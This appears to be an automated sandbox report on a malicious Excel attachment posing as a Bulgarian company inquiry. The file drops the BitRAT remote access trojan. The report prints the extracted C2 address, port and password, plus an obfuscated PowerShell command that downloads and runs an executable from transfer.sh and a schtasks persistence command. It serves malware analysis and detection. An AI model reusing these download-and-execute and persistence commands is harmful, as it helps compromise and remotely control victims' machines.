Analysis

  • max time kernel
    69s
  • max time network
    93s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2023 15:58

General

  • Target

    Zapitvane_MACH_BULGARIA_EOOD_09_2023.xls

  • Size

    100KB

  • MD5

    55e0c24ad93d53e9a161d813f09d9e9a

  • SHA1

    e3b6b703b99801b32a4c9754d591383dc30432bb

  • SHA256

    c1f218a24f82946584e59d64abc9762e85614803fe82c432d21678d1ae000db5

  • SHA512

    55127c6cbb0a7120f86378feb4057ccfc5341b22f902fffd14121cde404002de6422ebc5b346ae8ea8967d458d4581c68f7ae97d6b0ff85ad10d38aa38071375

  • SSDEEP

    3072:QrxEtjPOtioVjDGUU1qfDlaGGx+cL2QnADtJE2zuxq+fr9wBLa71ba2ryLTHeYR:2xEtjPOtioVjDGUU1qfDlavx+W2QnApF

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Zapitvane_MACH_BULGARIA_EOOD_09_2023.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:232
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/YeTYSYp0DR/abe.e^xe -o C:\Users\Public\gg1c8.exe;C:\Users\Public\gg1c8.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3228
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/YeTYSYp0DR/abe.exe -o C:\Users\Public\gg1c8.exe;C:\Users\Public\gg1c8.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4612
        • C:\Users\Public\gg1c8.exe
          "C:\Users\Public\gg1c8.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:2384
          • C:\Users\Public\gg1c8.exe
            "C:\Users\Public\gg1c8.exe"
            5⤵
            • Executes dropped EXE
            PID:3480
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3480 -s 188
              6⤵
              • Program crash
              PID:2408
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c copy "C:\Users\Public\gg1c8.exe" "C:\Users\Admin\AppData\Roaming\state\state.exe"
            5⤵
              PID:2840
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\state\state.exe'" /f
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1768
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\state\state.exe'" /f
                6⤵
                • Creates scheduled task(s)
                PID:4996
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\state"
              5⤵
                PID:2580
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3480 -ip 3480
        1⤵
          PID:1716
        • C:\Users\Admin\AppData\Roaming\state\state.exe
          C:\Users\Admin\AppData\Roaming\state\state.exe
          1⤵
          • Executes dropped EXE
          PID:4340

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t1yaq1jb.akd.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\state\state.exe
          Filesize

          7.6MB

          MD5

          18e07c4772a2687ee06a434ffef9572f

          SHA1

          ff1a7e4f53efdbd0935bcf8a8dac338ea96c9dbe

          SHA256

          ef509cb0a60d929e4f0acd3696e724397dc8113170df0ef478ea2afaae7800d8

          SHA512

          8795a49d7c5993f24a290e9d5f9299871af4ffd51a66b0656bf0057cdc15b1286350aae55be7b69cec660df1353f5a4dffdc08004a1b447b1b75e5645ac6188b

        • C:\Users\Admin\AppData\Roaming\state\state.exe
          Filesize

          5.9MB

          MD5

          45c50cc602b9619ddb74801efd8dd8af

          SHA1

          5447633998fe50f39d10c4df2d7c2342ada25e91

          SHA256

          15262068fe6689fc3c753ecff48e02ded340651ab80a80f38364bddcc12ae8d3

          SHA512

          69ed4cb953f6cc309f740b128e006f0e789913e375d1456646a159c56a023ea376f1c54f7461ca8a90781e9968be33e1b9c85423cb11739af10cfdd5000a9c5b

        • C:\Users\Admin\AppData\Roaming\state\state.exe
          Filesize

          5.2MB

          MD5

          569249599442b3d5bade01734cf7ca16

          SHA1

          89c367118c4e5df714fd349d9aae709add3f178a

          SHA256

          e7c54a3c4ef7c23491f22659d993d3acd8eb10bbe1e003f2f7ba932c1a0df19d

          SHA512

          232e6fdd70668d40f93a31a5f0334239eeeb254c325c6b5139a96bacb59b6823e7a354ab32681c41843b8573380e804894850a75f34004272f94c32d406cbd78

        • C:\Users\Public\gg1c8.exe
          Filesize

          7.6MB

          MD5

          18e07c4772a2687ee06a434ffef9572f

          SHA1

          ff1a7e4f53efdbd0935bcf8a8dac338ea96c9dbe

          SHA256

          ef509cb0a60d929e4f0acd3696e724397dc8113170df0ef478ea2afaae7800d8

          SHA512

          8795a49d7c5993f24a290e9d5f9299871af4ffd51a66b0656bf0057cdc15b1286350aae55be7b69cec660df1353f5a4dffdc08004a1b447b1b75e5645ac6188b

        • C:\Users\Public\gg1c8.exe
          Filesize

          7.6MB

          MD5

          18e07c4772a2687ee06a434ffef9572f

          SHA1

          ff1a7e4f53efdbd0935bcf8a8dac338ea96c9dbe

          SHA256

          ef509cb0a60d929e4f0acd3696e724397dc8113170df0ef478ea2afaae7800d8

          SHA512

          8795a49d7c5993f24a290e9d5f9299871af4ffd51a66b0656bf0057cdc15b1286350aae55be7b69cec660df1353f5a4dffdc08004a1b447b1b75e5645ac6188b

        • C:\Users\Public\gg1c8.exe
          Filesize

          7.6MB

          MD5

          18e07c4772a2687ee06a434ffef9572f

          SHA1

          ff1a7e4f53efdbd0935bcf8a8dac338ea96c9dbe

          SHA256

          ef509cb0a60d929e4f0acd3696e724397dc8113170df0ef478ea2afaae7800d8

          SHA512

          8795a49d7c5993f24a290e9d5f9299871af4ffd51a66b0656bf0057cdc15b1286350aae55be7b69cec660df1353f5a4dffdc08004a1b447b1b75e5645ac6188b

        • memory/232-43-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-46-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-9-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-10-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-11-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-12-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-14-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-13-0x00007FFA081D0000-0x00007FFA081E0000-memory.dmp
          Filesize

          64KB

        • memory/232-15-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-16-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-17-0x00007FFA081D0000-0x00007FFA081E0000-memory.dmp
          Filesize

          64KB

        • memory/232-24-0x0000023050670000-0x0000023050E70000-memory.dmp
          Filesize

          8.0MB

        • memory/232-26-0x0000023050670000-0x0000023050E70000-memory.dmp
          Filesize

          8.0MB

        • memory/232-27-0x0000023050670000-0x0000023050E70000-memory.dmp
          Filesize

          8.0MB

        • memory/232-8-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-1-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-2-0x00007FFA0A970000-0x00007FFA0A980000-memory.dmp
          Filesize

          64KB

        • memory/232-3-0x00007FFA0A970000-0x00007FFA0A980000-memory.dmp
          Filesize

          64KB

        • memory/232-4-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-42-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-0-0x00007FFA0A970000-0x00007FFA0A980000-memory.dmp
          Filesize

          64KB

        • memory/232-44-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-45-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-7-0x00007FFA0A970000-0x00007FFA0A980000-memory.dmp
          Filesize

          64KB

        • memory/232-47-0x0000023050670000-0x0000023050E70000-memory.dmp
          Filesize

          8.0MB

        • memory/232-50-0x0000023050670000-0x0000023050E70000-memory.dmp
          Filesize

          8.0MB

        • memory/232-6-0x00007FFA4A8F0000-0x00007FFA4AAE5000-memory.dmp
          Filesize

          2.0MB

        • memory/232-5-0x00007FFA0A970000-0x00007FFA0A980000-memory.dmp
          Filesize

          64KB

        • memory/2384-65-0x0000000000090000-0x000000000082E000-memory.dmp
          Filesize

          7.6MB

        • memory/2384-79-0x0000000074D40000-0x00000000754F0000-memory.dmp
          Filesize

          7.7MB

        • memory/2384-68-0x0000000006DF0000-0x000000000757A000-memory.dmp
          Filesize

          7.5MB

        • memory/2384-67-0x0000000005280000-0x0000000005290000-memory.dmp
          Filesize

          64KB

        • memory/2384-66-0x0000000005840000-0x0000000005DE4000-memory.dmp
          Filesize

          5.6MB

        • memory/2384-64-0x0000000074D40000-0x00000000754F0000-memory.dmp
          Filesize

          7.7MB

        • memory/3480-74-0x0000000000DB0000-0x000000000117E000-memory.dmp
          Filesize

          3.8MB

        • memory/3480-70-0x0000000000DB0000-0x000000000117E000-memory.dmp
          Filesize

          3.8MB

        • memory/3480-80-0x0000000000DB0000-0x000000000117E000-memory.dmp
          Filesize

          3.8MB

        • memory/4612-51-0x00007FFA22650000-0x00007FFA23111000-memory.dmp
          Filesize

          10.8MB

        • memory/4612-62-0x00007FFA22650000-0x00007FFA23111000-memory.dmp
          Filesize

          10.8MB

        • memory/4612-52-0x000002682B610000-0x000002682B620000-memory.dmp
          Filesize

          64KB

        • memory/4612-41-0x000002682B610000-0x000002682B620000-memory.dmp
          Filesize

          64KB

        • memory/4612-53-0x000002682B610000-0x000002682B620000-memory.dmp
          Filesize

          64KB

        • memory/4612-54-0x000002682B610000-0x000002682B620000-memory.dmp
          Filesize

          64KB

        • memory/4612-40-0x000002682B610000-0x000002682B620000-memory.dmp
          Filesize

          64KB

        • memory/4612-39-0x00007FFA22650000-0x00007FFA23111000-memory.dmp
          Filesize

          10.8MB

        • memory/4612-34-0x000002682B790000-0x000002682B7B2000-memory.dmp
          Filesize

          136KB